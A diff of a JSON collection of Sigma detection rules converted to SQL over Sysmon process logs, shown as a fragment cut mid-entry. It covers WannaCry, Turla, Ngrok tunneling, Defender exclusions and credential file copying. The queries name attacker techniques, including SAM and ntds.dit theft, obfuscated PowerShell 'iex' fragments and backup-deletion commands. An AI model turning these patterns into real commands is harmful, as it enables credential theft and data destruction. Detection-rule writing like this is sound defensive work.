'%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_advanced_ip_scanner.yml" + "filename": "proc_creation_win_lolbin_diskshadow.yml" }, { - "title": "Remote PowerShell Session Host Process (WinRM)", - "id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", - "status": "test", - "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE", + "id": "48917adc-a28e-4f5d-b729-11e75da8941f", + "status": "experimental", + "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. Qbot has been seen using this technique to add exlcusions for folders within AppData and ProgramData.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1021.006" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of remote Powershell, e.g. for monitoring purposes." + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Paths%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Paths%' ESCAPE '\\') AND CommandLine LIKE '%ADD %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD %' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml" + "filename": "proc_creation_win_reg_defender_exclusion.yml" }, { - "title": "PUA - AdvancedRun Execution", - "id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", + "title": "CL_Mutexverifiers.ps1 Proxy Execution", + "id": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of a Microsoft signed script to execute commands", + "author": "oscd.community, Natalia Shornikova, frack113", + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'AdvancedRun.exe' OR (CommandLine LIKE '% /EXEFilename %' ESCAPE '\\' AND CommandLine LIKE '% /Run%' ESCAPE '\\') OR (CommandLine LIKE '% /WindowState 0%' ESCAPE '\\' AND CommandLine LIKE '% /RunAs %' ESCAPE '\\' AND CommandLine LIKE '% /CommandLine %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND CommandLine LIKE '%runAfterCancelProcess %' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_advancedrun.yml" + "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml" }, { - "title": "Ps.exe Renamed SysInternals Tool", - "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "title": "PUA - Ngrok Execution", + "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "status": "test", - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Renamed SysInternals tool" + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine = 'ps.exe -accepteula')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (Image LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml" + "filename": "proc_creation_win_pua_ngrok.yml" }, { - "title": "Use of UltraViewer Remote Access Software", - "id": "88656cec-6c3b-487c-82c0-f73ebb805503", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", + "status": "test", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UltraViewer' OR Company = 'DucFabulous Co,ltd' OR OriginalFileName LIKE 'UltraViewer\\_Desktop.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_software_ultraviewer.yml" + "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" }, { - "title": "Dropping Of Password Filter DLL", - "id": "b7966f4a-b333-455b-8370-8ca53c229762", - "status": "test", - "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", - "author": "Sreeman", + "title": "Delete Important Scheduled Task", + "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556.002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '%scecli\\\\0%' ESCAPE '\\' AND CommandLine LIKE '%reg add%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml" + "filename": "proc_creation_win_schtasks_delete.yml" }, { - "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", - "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "title": "Turla Group Commands May 2020", + "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", "status": "test", - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "author": "John Lambert (rule)", + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + "filename": "proc_creation_win_apt_turla_comrat_may20.yml" }, { - "title": "WebDav Client Execution", - "id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", - "status": "test", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Shells Spawned by Java", + "id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "status": "experimental", + "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Legitimate calls to system binaries", + "Company specific internal usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT (ParentImage LIKE '%build%' ESCAPE '\\' AND CommandLine LIKE '%build%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_webdav_client_execution.yml" + "filename": "proc_creation_win_java_susp_child_process_2.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", - "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "title": "Install New Package Via Winget Local Manifest", + "id": "313d6012-51a0-4d93-8dfc-de8553239e25", "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.\nThe manifest option enables you to install an application by passing in a YAML file directly to the client.\nWinget can be used to download and install exe, msi or msix files later.\n", + "author": "Sreeman, Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Some false positives are expected in some environment that may use this functionality to install and test their custom applications" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\') AND (CommandLine LIKE '%-m %' ESCAPE '\\' OR CommandLine LIKE '%--manifest%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_new_network_provider.yml" + "filename": "proc_creation_win_winget_local_install_via_manifest.yml" }, { - "title": "Nslookup PowerShell Download Cradle - ProcessCreation", - "id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", + "title": "Rundll32 UNC Path Execution", + "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", "status": "experimental", - "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nslookup.exe%' ESCAPE '\\' OR OriginalFileName LIKE '\\\\nslookup.exe' ESCAPE '\\') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -q=txt %' ESCAPE '\\' OR CommandLine LIKE '% -querytype=txt %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_nslookup_poweshell_download.yml" + "filename": "proc_creation_win_rundll32_unc_path.yml" }, { - "title": "Suspicious File Download Using Office Application", - "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "title": "Copying Sensitive Files with Credential Data", + "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "status": "test", - "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", - "author": "Beyu Denis, oscd.community", + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" ], "falsepositives": [ - "Unknown" + "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_office.yml" + "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" }, { - "title": "HackTool - UACMe Akagi Execution", - "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "title": "Suspicious CustomShellHost Execution", + "id": "84b14121-9d14-416e-800b-f3b829c5a14d", "status": "experimental", - "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", - "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (Image LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\CustomShellHost.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_uacme.yml" + "filename": "proc_creation_win_lolbin_customshellhost.yml" }, { - "title": "WannaCry Ransomware Activity", - "id": "41d40bff-377a-43e2-8e1b-2e543069e079", - "status": "test", - "description": "Detects WannaCry ransomware activity", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "title": "Renamed PsExec Service Execution", + "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "status": "experimental", + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", - "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR Image LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskse.exe' ESCAPE '\\' OR Image LIKE '%\\\\111.exe' ESCAPE '\\' OR Image LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR Image LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR Image LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR Image LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'psexesvc.exe' AND 